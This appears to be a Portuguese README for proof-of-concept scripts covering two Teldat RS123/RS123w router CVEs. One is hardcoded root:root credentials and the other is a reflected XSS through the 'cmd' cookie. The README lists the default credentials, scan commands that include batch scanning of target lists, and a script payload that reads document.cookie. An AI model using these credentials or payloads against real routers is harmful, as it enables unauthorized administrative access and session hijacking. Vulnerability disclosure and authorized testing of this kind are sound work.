
POC para CVE-2022-39996 (XSS Refletido) e CVE-2022-39997 (Senha Fraca) no Roteador Teldat RS123/RS123w
Prova de conceito para duas vulnerabilidades descobertas em roteadores Teldat RS123 / RS123w.
| CVE ID | Tipo | CWE | CVSS | Severidade |
|---|---|---|---|---|
| CVE-2022-39996 | XSS Refletido | CWE-79 | 6.1 | Médio |
| CVE-2022-39997 | Senha Fraca | CWE-521 | 9.8 | Crítico |
Produto Afetado: Roteador Teldat RS123, RS123w
Os roteadores Teldat RS123/RS123w são fornecidos com credenciais padrão codificadas root:root. Administradores frequentemente deixam essas credenciais inalteradas, permitindo que atacantes não autenticados obtenham acesso administrativo completo via Telnet, SSH, HTTP ou outros serviços.
Account: root
Password: root

pip install requests paramiko
# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1
# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all
# Batch scan
python CVE-2022-39997.py -f targets.txt
O endpoint /upgrade/index.html reflete o valor do cookie HTTP cmd na resposta sem sanitização. Um atacante pode criar uma requisição maliciosa contendo JavaScript no cookie cmd. Quando um administrador autenticado visita a página, o script é executado no contexto do navegador da interface web do roteador, permitindo sequestro de sessão ou manipulação de configuração.
cmd:

pip install requests
# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1
# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root
# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi
# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc
# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
| Arquivo | Descrição |
|---|---|
CVE-2022-39997.py | Detecção de senha fraca (Telnet / SSH / HTTP / FTP) |
CVE-2022-39996.py | Detecção de XSS refletido via cookie cmd |
Teldat's Router Vulnerability.md | Relatório completo de divulgação de vulnerabilidade |
Estes scripts POC são apenas para testes de segurança educacionais e autorizados. Não use contra sistemas que você não possui ou para os quais não tem permissão explícita para testar. O autor não é responsável por qualquer uso indevido ou dano.